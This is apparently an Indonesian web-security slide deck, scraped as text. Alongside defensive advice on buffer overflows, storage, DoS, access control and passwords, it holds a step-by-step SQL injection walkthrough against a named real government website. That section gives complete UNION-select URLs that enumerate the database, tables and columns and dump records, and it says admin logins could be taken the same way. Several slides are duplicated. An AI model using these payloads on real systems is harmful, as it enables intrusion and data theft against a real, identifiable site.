  • 10. 1. Menulis kode yang aman : Buffer overflow adalah hasil dari input yang berlebihan ke dalam buffer. C library seperti strcpy (), stcat (), sprintf () dan vsprintf beroperasi pada null terminated strings dan tidak mengecek batasan input. Gets () juga fungsi lainnya yang memasukkan input ke dalam buffer dari stdin. Pada scanf () juga bisa mengakibat buffer overflows. 2. Stack execute invalidation: karena koding jahat (contoh, instruksi assembly untuk mengambil alih root shell) merupakan input rgument ke dalam program, ini tersimpan ke dalam stack dan bukan dalam code segment. Oleh karena itu solusi mudahnya adalah tidak memperboleh adalah tidak memperbolehkan stack mengesekusi intruksi apapun. Kode apapun yang dieksekusi dengan kode lainnya di dalam stack dapat mengakibatkan segmentation violation. 3. Compiler tools : Beberapa tahun terakhir, compiler mempunyai kemampuan lebih. Beberapa compiler di lengkapi peringatan dalam menggunakan kostruk yang tidak aman seperti gets (), strpy () dan sejenisnya sebagai contoh: Int main (){ Char*str = (char*) malloc (10);// mengalokasikan 10 bytes untuk str Gets (str);// membaca input dari stdin dan disimpan ke str } Setelah di compiler tool mempunyai fitur untuk bounds checking, jadi meng generate kode yang built-in tanpa mengubah struktur kode yang dapat menghindarkan penggunaan ilegal address tidak diperbolehkan untuk eksekusi. Gunakanlah patch GCC untuk mendapatkan fitur mendapatkan fitur bounds checking, dapat anda temui dihttp://web.inter.nl.net/hcc/Haj.Ten.Brugge patch ini juga mencegah tindakan penimpaan return adress, seperti yang banyak terjadi. Dan juga gunakan tools stackshield di http://www.angelfire.com/sk/stackshield/index.html .
  • 11. injection flaws Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi, seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui username atau id dan password admin pengelola website tersebut. SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan Teknologi Republik Indonesia dengan alamat url : http://....go.id Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi, seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui username atau id dan password admin pengelola website tersebut.
  • 12. SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan Teknologi Republik Indonesia dengan alamat url : http://....go.id Gambar 1. Halaman utama website Bagaimana sebuah website bisa diketahui memiliki kelemahan untuk di lakukan sql dengan memasukan karakter- atau ` ke dalam halaman website yang memiliki karakter angka, misalnya : http://drn.go.id/index.php?option=com_frontpage&catid=13 ,sehinga didapat error page seperti gambar di bawah ini. Error SQL ini merupakan salah satu kelemahan dalam membangun struktur basis data dalam mendefinisikan type data.
  • 13. Gambar 2.error page Error SQL yang terlihat, dapat dimanfaatkan untuk mengetahui nama database dan table-table dalam databse tersebut yang digunakan sebagai basis data website ini. Untuk mengetahui nama databasenya adalah dengan menambahkan sintak ‘ and 1=2 by n`pada akhirnya alamat url, dimana n=12345,...,n dimasukan satu per satu nilai n tersebut, sehingga error page berubah menjadi ‘unknown coloum’
  • 14. Gambar 3. error unkown coloum Pada website ini error ‘unkown column’ yang ditemukan adalah mengetahui versi mysql dan username administrator database, yaitu dengan memasukkan sintak `and 1=2 union select version(), 2-`sehingga diketahui versi mysqlnya adalah versi 5.
  • 15. Gambar 4. diketahui versi mysql Dan selanjutnya untuk mengetahui nama username dan databse pada website ini adalah dengan mengganti sintak version (), menjadi databsse dan user (), contohnya adalah alamat url berikut ini: http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+database(),2--&Itemid=2 Gambar 5. diketahui nama database Dan setelah nama databasenya, akan mudah untuk mengetahui nama tabel-tabel pada database tersebut, adalah dengan memasukkan sintak `and 1=2 union select group_concat (table_name) from information_schema.tables where table_schema=database ()- `pad akhir alamat url, menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+where+table_ schema=database()--&Itemid=2 maka akan diketahui nama-nama tabel pada database tersebut seperti pada gambar dibawah ini
  • 16. Gambar 6. nama table-table pada database Terlihat nama table-table pada database ini adalah agenda batas_orangjam, buku_alamat, dimanam direktori, direktori_url, disposisi_surat, fasilitas, file,tb, forum, grup, grup_pengguna, hasil_jajak,_pendapat, ing_core_acl_aro, ing_core_acl_aro_groups, ing_core_acl_aro_sections, ing_core_acl_group_aro_map,ing_core_log_items,ing_core_log_sear Setelah mengetahui struktur tabel pada database ini, akan mudah untuk mengetahui nama kolom- kolom pada tabel-tabel tersebut adalah dengan memasukkan sintak : `and 1=2 union select group_concat (table_name) from information_schema.tables where table_name=mysqlchar(table_name)-,bagaimana mendapatkan nilai mysqchar adalah dengan mengkonversi nama tabel menjadi bantuan sql pada localhost kita, nama tabel agenda dikonversi menjadichar (97,103,101,110,100,97). Sehingga alamat url menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281%20and%201=0%20union%20select%20group_concat(column_name),2%20from%20informati on_schema.columns%20where%20table_name=CHAR(97,103,101,110,100,97)--&Itemid=2 Dan didapat nama kolom pada tabel agenda seperti pada gambar
  • 17. Injection Flows Injection flaws,yaitu salah satu teknik hacking yang memanfaatkan celah keamanan pada basis datanya. dan yang sering digunakan adalah SQL injectiondengan memasukan perintah-perintah SQL pada website yang lemah dalam membuat struktur basis data, akan memudahkan bagi hacker untuk mendapatkan informasi pribadi, seperti strukur tabel basis data, kolom-kolom yang terdapat pada tabel basis data tersebut, hingga isi record basis data tersebut. sehinggahacker bisa mengetahui username atau id dan password admin pengelola website tersebut. SQL injection termasuk salah satu cara menembus celah keamanan yang sudah lama diketahui, namum hingga saat ini masih banyak pemeintah Indonesia, salah satunya adalah website milik salah satu instansi pemerintah di bawah kementerian Riset dan Teknologi Republik Indonesia dengan alamat url : http://....go.id
  • 18. Gambar 1. Halaman utama website Bagaimana sebuah website bisa diketahui memiliki kelemahan untuk di lakukan sql dengan memasukan karakter- atau ` ke dalam halaman website yang memiliki karakter angka, misalnya : http://drn.go.id/index.php?option=com_frontpage&catid=13 ,sehinga didapat error page seperti gambar di bawah ini. Error SQL ini merupakan salah satu kelemahan dalam membangun struktur basis data dalam mendefinisikan type data.
  • 19. Gambar 2.error page Error SQL yang terlihat, dapat dimanfaatkan untuk mengetahui nama database dan table-table dalam databse tersebut yang digunakan sebagai basis data website ini. Untuk mengetahui nama databasenya adalah dengan menambahkan sintak ‘ and 1=2 by n`pada akhirnya alamat url, dimana n=12345,...,n dimasukan satu per satu nilai n tersebut, sehingga error page berubah menjadi ‘unknown coloum’
  • 20. Gambar 3. error unkown coloum Pada website ini error ‘unkown column’ yang ditemukan adalah mengetahui versi mysql dan username administrator database, yaitu dengan memasukkan sintak `and 1=2 union select version(), 2-`sehingga diketahui versi mysqlnya adalah versi 5.
  • 21. Gambar 4. diketahui versi mysql Dan selanjutnya untuk mengetahui nama username dan databse pada website ini adalah dengan mengganti sintak version (), menjadi databsse dan user (), contohnya adalah alamat url berikut ini: http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+database(),2--&Itemid=2
  • 22. Gambar 5. diketahui nama database Dan setelah nama databasenya, akan mudah untuk mengetahui nama tabel-tabel pada database tersebut, adalah dengan memasukkan sintak `and 1=2 union select group_concat (table_name) from information_schema.tables where table_schema=database ()- `pad akhir alamat url, menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+w here+table_schema=database()--&Itemid=2 maka akan diketahui nama-nama tabel pada database tersebut seperti pada gambar dibawah ini
  • 23. Gambar 7. nama kolom pada tabel agenda maka diketahui, nama kolom pada tabel agenda adalah kode_agenda pemilik, judul, tipe, tgl_mulai, waktu_mulai, waktu_selesai, kode_pengulangan, kode_undangan, deskripsi, tgl_dibuat, tgl_diubah, sharing_publik, sifat_sharing, undang_via_email, undang_via_sms. Terakhir untuk mengetahui isi dari kolom-kolom tersebut adalah dengan memasukkan sintak `and 1=2 union select group_concat(nama_kolom0x3a,nama_kolom lainnya) from nama_table- Sehingga url menjadi : http://www.drn.go.id/index.php?option=isi&task=view&id=- 281+and+1=2+union+select+group_concat(kode_agenda,0x3a,pemilik,0x3a,judul,0x3a,tipe,0x3a,tg l_mulai,0x3a,waktu_mulai,0x3a,waktu_selesai,0x3a,kode_pengulangan,0x3a,kode_undangan,0x3a ,deskripsi,0x3a,tgl_dibuat,0x3a,tgl_diubah,0x3a,sharing_publik,0x3a,sifat_sharing,0x3a,undang_via _email,0x3a,undang_via_sms),2+from+agenda--&Itemid=2
  • 24. Gambar 8. isi kolom pada tabel agenda Maka selanjutnya sql injection inid apat dimanfaatkan oleh orang yang tidak bertanggung jawab untuk mengetahui nama username dan administrasi untuk login sebagai administrator website ini.
  • 25. VII Insecure storage Aplikasi web biasanya perlu menyimpan informasi yang sensitif seperti password, informasi kartu kredit, dan yang lain. Dikarenakan item-item tersebut bersifat sensitif item-item tersebut perlu dienkripsi untuk menghindari pengaksesan secara langsung. Akan tetapi beberapa metode enkrips lemah dan masih bisa diserang. Berikut ini beberapa kesalahan yang sering terjadi : •Kesalahan untuk mengenkripsi data penting. • Tidak amannya kunci, certificate, dan password • Kurang amannya tempat penyimpanan data • Kurangnya perhitungan dari rekomendasi • Kesalahan pemilihan algoritma • Mencoba untuk menciptakan algoritma enkripsi yang baru. Berdasarkan skenario berikut ini : Terdapat sebuah aplikasi, dimana terdapat password pada user object. Akan tetapi, aplikasi menyimpan user objek ke dalam session setelah user login. Permasalahan yang akan muncul pada skenario ini adalah password dapat dilihat oleh seseorang yang dapat melihat session user tersebut. Salah satu cara yang dilakukan untuk menghindari kesalahan penyimpanan informasi yang sensitif adalah : tidak membuat password sebagai atribut dari kelas yang mewakili informasi user; Daripada mengenkripsi nomor kartu kredit dari user, akan lebih baik untuk menanyakannya setiap kali dibutuhkan. Selain itu, menggunakan algoritma enkripsi yang sudah ada akan lebih baik daripada membuat algoritma sendiri. Anda cukup memastikan algoritma yang akan digunakan telah diakui oleh public dan benar-benar dapat dilaksanakan.
  • 26. VIII Deniel of Service Deniel of Service merupakan serangan yang dibuat oleh hacker yang mengirimkan request dalam jumlah yang sangat besar dan dalam waktu yang bersamaan. Dikarenakan request-request tersebut, server menjadi kelebihan beban dan tidak bisa melayani user lainnya. Serangan DoS mampu menghabiskan bandwidth yang ada pada server. Selain itu dapat juga menghabiskan memory, koneksi database, dan sumber yang lain. Pada umumnya sangat sulit umtuk melindungi apliksi dari serangan ini. Akan tetapi masih ada cara yang dapat dilakukan seperti membatasi resource yang dapat di akses user dalam jumlah yang minimal. Merupakan ide/cara yang bagus untuk membuat load quota yang membatasi jumlah load data yang akan diakses user dari sistem. Salah satu contoh adalah pada implementasi bulletin board : adanya pembatasan user pada ssaat melakukan search, dimana operasi ini hanya dapat dilakukan setiap 20 detik. Dengan cara ini dapat dipastikan bahwa user tiadk bisa menghasbiakan koneksi dari database. Solusi yang lain adalah mendesain aplikasi web dimana user yang belum terotorisasi hanya memiliki akses yang sedikit atau tidak memilki akses ke content web yang berhunbungan dengan databse. IX Insecure Configuration Management Biasanya kelompok (group) yang mengembangkan aplikasi berbeda dengan kelompok yang mengatur hosting dari aplikasi. Hal ini bisa menjadi berbahaya, dikarenakan keamanan yang diandalkan hanya dari segi aplikasi : sedangkan dari segi server juga memiliki aspek keamanan yang perlu diperhatian, Adanya kesalahan dari konfigurasi server dapat melewati aspek keamanan dari segi aplikasi. Berikut ini adalah kesalahan konfigurasi server yang bisa menimbulkan masalah :
  • 27. II Broken Access Control Banyak aplikasi yang mengkategorikan user-usernya ke dalam role yang berbeda dan level yang berbeda untuk berinteraksi dengan content yang dibedakan dari kategori-kategori tersebut, salah satu contohnya, banyak aplikasi yang terdapat user role dan admin role: hanya admin role yang dijinkan untuk mengakses halaman khusus atau melakukan action melakukan action administration. Masalahnya adalah beberapa aplikasi tidak efektif untuk memaksa agar otomatis ini bekerja contohnya, beberapa program hanya menggunakan sebuah chekpoint dimana hanya user yang terpilih yang dapat mengakses: untuk proses lebih lanjut, user harus membuktikan dirinya menjalankan pengecekan dari chek point sebelumnya: dimana apabila user berhasil melewati halaman login, mereka dapat bebas menjalankan operasi. Masalah lain yang berhubungan dengan access control adalah : a. Insecure Ids (Id Tidak aman) – beberapa site menggunakan id atau kunci yang menunjukan kepada user atau fungsi. ID dapat juga ditebak, dan jika hacker dapat mudah menebak ID dari user yang terautorisasi, maka site akan mudah diserang. b. File permissions- kebanyakan web dan aplikasi server percaya kepada external file yang menyimpan daftar dari user yang terotorisasi dan resources mana saja yang dapat dan/atau tidak dapat di akses. Apabila file ini dapat di baca dari luar, maka hacker dapat memodifikasi dengan mudah untuk menambahkan dirinya pada daftar user yang diijinkan. Langkah –langkah apa saja yang dapat di lakukan untuk mengatasinya? Pada contoh-contoh tadi, kita dapat mengembangkan filter atau komponen yang dapat di jalankan pada sensitive resources, filter atau komponen tadi dapat menjamin hanya user yang terotorisasi dapat mengakses. Untuk melindungi dari inseure Ids yang dapat memberi acess control, pada masalah file permission, file- file tersebut harus berada pada lokasi yang tidak dapat di akses oleh web browser dan hanya role tertentu saja yang dapat mengaksesnya.
  • 28. Cara Mengatasi Ancaman Hacker Dan Cracker Ada banyak jenis software untuk mengatasi ancaman dari Hacker, salah satunya adalah Zona Alarm. Zone Alarm di design untuk melindungi komputer PC, Laptop maupun Netbook dari ancamana hacker di internet. . Software ini memiliki 4 fungsi keamanan yaitu: •Firewal; Firewall pada zone alarm berfungsi untuk mengendalikan akses masukke komputer anda dan meminta izin untuk mengakses situs/web yang ingin anda kunjungi dengan demikian anda memiliki kesempatan untuk cek web tersebut layak atau tidak dibuka, biasanya situs/web yang mengandung pornografi, content dewasa, dllSelain itu juga anda dapat mengatur tingkat keamanan internet zona security dan trusted zona security. •Aplication Control; Aplication Control berfungsi untuk mengontrol program-program yang beroperasi membutuhkan akses internet seperti: Internet Explorer, Mozilla, FTP, dll. Nah dengan bantuan fitur ini tentu mengurangi resiko terhadap serangan/ancaman langsung dari hacker yang sedang online. •Anti Virus Monitoring; Antivirus Monitoring berfungsi untuk memonitor status dari ancaman virus yang masuk ke komputer anda baik online maupun offline. • Email Protection; Dari namanya tentu anda tahu fungsinya?, benar fungsi dari Email Protection adalah melindungi email dari ancaman virus, malware, dll.
  • 29. Mengatasi Sarangan Hacker Pada Website • Login ke cpanel, pastikan ’Last Login From’ tercantum IP publik anda Langkah pertama adalah mengecek pada bagian “Last login from” melalui panel kontrol anda. Pastikan harus selalu tercantum alamat IP publik dari mana terakhir kali anda melakukan login. Bagaimana cara menemukan IP publik kita? Cara termudah adalah dengan membuka situs domain checker semacam http://who.is. Biasanya tepat pada portalnya akan muncul tulisan Your IP is 183.7.xxx.xxx. Itulah alamat IP publik anda.Kembali lagi jika pada “Last login from” tercantum alamat IP lain yang tidak anda ketahui, catat. Hal ini berbahaya sebab logikanya jika alamat IP lain bisa login ke kontrol panel kita, berarti mereka memiliki username, password, dan semua akses ke situs kita. Dan inilah indikasi awal bahwa website kita mendapat serangan. • Menyalakan fitur Log ArchivingWebsite akses log menyimpan rekaman mendetail tentang siapa yang melakukan koneksi ke situs kita, baik melalui HTTP (pengunjung normal) maupun melalui FTP (transfer file). Umumnya, log tersebut dihapus setiap harinya. Padahal peranan akses log sangatlah penting. Agar akses log tidak terhapus, lakukan langkah berikut : Login ke cpanel > Raw Log Manager, Cek pada kotak “Archive Logs”, Uncek pada kotak “Remove the previous month’s archived logs”, Klik Save •Langkah darurat; segera offline kan website anda Jika halaman anda terinfeksi virus yang memiliki kemungkinan virus tersebut bisa menyerang pengunjung situs anda, maka segera lindungi pengunjung anda dan juga reputasi anda. Yaitu dengan membuat website anda berstatus offline. Bisa dengan menambahkan beberapa baris kode pada .htaccess, maupun mengupload tampilan halaman under construction. Jika anda melakukannya dengan segera, anda memiliki kemungkinan untuk menghindarkan situs anda mendapat predikat “This site may harm your computer” dari Google. Selain itu, penyerang biasanya telah menginstal backdoor script pada halaman index anda yang memungkinkan mereka untuk kembali ke server anda. Menetapkan status offline pada situs anda sementara, sedikitnya memiliki kemungkinan untuk mengunci dan membuat penyerang tidak bisa masuk melalui backdoor yang telah diinstal.
  • 30. •Semua administrators situs melakukan scan pada PC masing-masin Fakta bahwa di tahun 2009, penyebab nomor satu dari hacking website adalah PC webmaster yang terinfeksi oleh malware. Malware semacam gumblar, dan martuz (yang telah kita bahas pada edisi sebelumnya, red.) Bertindak sebagai jembatan dalam mencuri informasi login FTP dan mengirimkannya ke komputer remote. Komputer remote inilah yang kemudian menyuntik halaman website korban dengan javascript atau iframes tersembunyi yang mengarahkan pengunjung website korban ke website berbahaya yang menyimpan gumblar dan martuz lainnya. Untuk menghindarinya, pastikan setiap orang yang memiliki akses password ke website anda melakukan setidaknya dua kali scan antivirus dan antispyware pada local komputer masing-masing dengan scanner yang bervariasi. Karena selama PC webmaster terinfeksi, mengubah password situs tidak akan berpengaruh sama sekali. Bukankah password baru dengan mudah dapat dicuri lagi? •Ganti semua password anda Setelah PC administrator bebas dari virus dan spyware, gantilah semua password yang berhubungan dengan situs anda. Panel kontrol, FTP, koneksi database, email akun, dan halaman administrator anda. Pergunakan kombinasi password yang kuat Yaitu password yang tidak mudah ditembus karena mengandung kombinasi kata, angka, dan karakter yang rumit. •Upgrade semua third party script ke versi terbaru Serangan semacam Remote File Inclusion (RFI) memanfaatkan vulnerability pada script versi lama dari script third party kita untuk menyusup ke dalam situs kita. Dan satu-satunya cara untuk menangkal serangan RFI ini adalah menggunakan versi terbaru dari script third party yang telah memiliki kekebalan terhadap RFI. Baik plugin, addon website hingga Content Management System (CMS) anda, segera upgrade ke versi terbaru. Jika anda menggunakan CMS semacam Joomla maupun wordpress, anda bisa mengikuti perkembangan rilis terbaru melalui situs resmi masing-masing CMS yang anda pakai. Update versi wordpress bisa dicek melalui wordpress.org, Joomla pada joomla.org, dan sebagainya. Cek juga situs secunia.com, sebuah situs yang berisi laporan sekuriti setiap third party script. Halaman situs secunia.com mendaftar kerentanan yang ditemukan pada plugin atau addon. Dengan mengecek di halaman tersebut, anda mengetahui apakah third party script yang anda pergunakan aman atau terdapat vulnerability di dalamnya.
  • 31. Beberapa Tips Membuat Password Anti Hacker • Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password facebook. Ini berarti • seseorang yang dapat menjebol password facebook Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password facebook lebih mudah daripada menjebol email Yahoo. Admin atau “orang dalam” facebook tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda. • Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker. •Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs facebook untuk alasan apapun (misalnya import address book). •Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau facebook.com buka facecrut.com atau yang lain. •Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.